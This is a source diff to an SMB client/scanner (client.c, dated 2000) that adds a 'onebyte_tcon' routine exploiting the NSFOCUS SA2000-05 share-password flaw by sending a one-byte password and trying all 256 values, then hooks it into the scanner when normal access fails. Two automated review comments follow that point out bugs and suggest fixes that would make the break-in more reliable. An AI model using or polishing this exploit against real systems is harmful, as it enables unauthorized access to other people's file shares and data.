*** client.c.orig Sun Oct 15 02:28:24 2000 --- client.c Sun Oct 15 03:04:28 2000 *************** *** 2740,2745 **** --- 2740,2844 ---- return True; } /* send_tcon */ + /* Attempt to break into share as described in NSFOCUS Security + * Advisory(SA2000-05) + * -ghandi , 20001015 + */ + static BOOL onebyte_tcon (char *inbuf,char *outbuf) + { + char * pass = password; + pstring dev; + register char * p; + register int x; + int i; + int passlen = strlen(pass)+1; /* moved from inside "again2" ctx */ + fstring pword; /* moved from inside "again2" ctx */ + + #if AJT + if (strstr(service,"IPC$")) connect_as_ipc = True; + #endif + + strcpy(dev,"A:"); + if (connect_as_printer) + strcpy(dev,"LPT1:"); + if (connect_as_ipc) + strcpy(dev,"IPC"); + + /* SCANNER: should split all this into separate functions for + sessreq / dialect / sesssetupX / tcon, that all take uname/pw args. + ... hmm, above looks like pre-lanman1 didn't use sesssetup??? */ + + /* now we've got a connection - send a tcon message */ + bzero(outbuf,smb_size); + + if (strncmp(service,"\\\\",2) != 0) + { + DEBUG(0,("\nWarning: Your service name doesn't start with \\\\. This is probably incorrect.\n")); + DEBUG(0,("Perhaps try replacing each \\ with \\\\ on the command line?\n\n")); + } + + sec_mode = 0; + for (i = 0, pword[0] = 0, passlen = 1; i < 256; i++, pword[0]++) { + set_message(outbuf,4,2 + strlen(service) + passlen + strlen(dev),True); + CVAL(outbuf,smb_com) = SMBtconX; + setup_pkt(outbuf); + + SSVAL(outbuf,smb_vwv0,0xFF); + SSVAL(outbuf,smb_vwv3,passlen); + + p = smb_buf(outbuf); + memcpy(p,pword,passlen); + p += passlen; + strcpy(p,service); + p = skip_string(p,1); + strcpy(p,dev); + + send_smb(Client,outbuf); + x = receive_smb(Client,inbuf,CLIENT_TIMEOUT); + /* XXX: need some other indicator that the net's hung, so step() bails */ + if (x == 0) { /* fukt connection? 
*/ + DEBUG(0,("tcon reply failed\n")); + return (False); + } + + if (CVAL(inbuf,smb_rcls) != 0) + { + DEBUG(2,("%s/%s: %s: %s\n", username, pass, service, smb_errstr(inbuf))); + cur_serr = interpret_serr + (CVAL (inbuf, smb_rcls), SVAL (inbuf, smb_err)); + /* this "can't happen" but does against misconfigured samba, fer example */ + if ((cur_serr == 2) && (sec_mode & 1)) + DEBUG (1,("Wanted TCon passwd in USER-mode + sec?!??!\n")); + } /* if smb_rcls err */ + else + break; + } + + /* we're in */ + DEBUG(0,("tcon %s connected as %s/%s\n", service, username, pass)); + #if 0 + /* done externally */ + if (read_pass && !(sec_mode & 1)) + exit (0); + #endif + + max_xmit = MIN(max_xmit,BUFFER_SIZE-4); + if (max_xmit <= 0) + max_xmit = BUFFER_SIZE - 4; + + cnum = SVAL(inbuf,smb_tid); + + /* could this actually happen?? */ + if (cnum == 0) { + DEBUG (0,("OOPS! opened tcon, but Tree-ID is zero?!?!\n")); + return (False); + } + DEBUG(3,("Connected with cnum=%d max_xmit=%d\n",cnum,max_xmit)); + + return True; + } /* onebyte_tcon */ + /* * stepped version of send_login, for compat with the old one */ *************** *** 3812,3824 **** #ifdef VERBOSE natprintf("[*]--- WARNING: Able to access share: %s\n", service); #endif ! phase = 6; goto phase_6; } else { #ifdef VERBOSE ! natprintf("[*]--- Unable to access\n"); #endif } /* --- 3911,3933 ---- #ifdef VERBOSE natprintf("[*]--- WARNING: Able to access share: %s\n", service); #endif ! phase = 6; goto phase_6; } else { + /* Now attempt to "one-byte" into the share by setting password + * length to 1 and trying all 256 values + * -ghandi + */ + x = onebyte_tcon(inbuf, outbuf); + if (x == 1) { #ifdef VERBOSE ! natprintf("[*]--- WARNING: Able to one-byte into share: %s\n", ! service); #endif + } + else + natprintf("[*]--- Unable to access\n"); } /*
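Review bot: When all 256 iterations of the for loop in onebyte_tcon fail, control falls out of the loop into the "we're in" path, so the function logs a successful tcon, reads cnum from the last error reply, and returns True unless that stale reply happens to carry a zero tree ID — the caller then reports a false positive. Add `if (i == 256) return False;` directly after the loop so exhaustion is distinguished from the `break` taken on success. Separately, `sec_mode = 0;` before the loop assigns a name that is not declared in this function, so it looks like it clobbers file-scope negotiation state (the `#if 0` block below also reads it), and it makes the `(sec_mode & 1)` test inside the loop dead; if a local flag was intended, declare one. The `strlen(pass)+1` initializer for passlen is overwritten by the loop's `passlen = 1` and `pass` is only used in DEBUG output, so passlen can be declared without it.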
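Review bot: The `natprintf("[*]--- Unable to access\n")` call in the new else branch has lost its `#ifdef VERBOSE` guard, whereas the line it replaces and the sibling warning just above it are guarded, so non-verbose builds now print this message where they were silent before; wrap it in `#ifdef VERBOSE` / `#endif` unless the change is deliberate. The result of onebyte_tcon is a BOOL but is compared with the literal 1 in `if (x == 1)`; `if (x)` avoids depending on True being exactly 1, and since x's declaration is outside the hunk, confirm its type there. The enclosing block starts and ends outside the hunk.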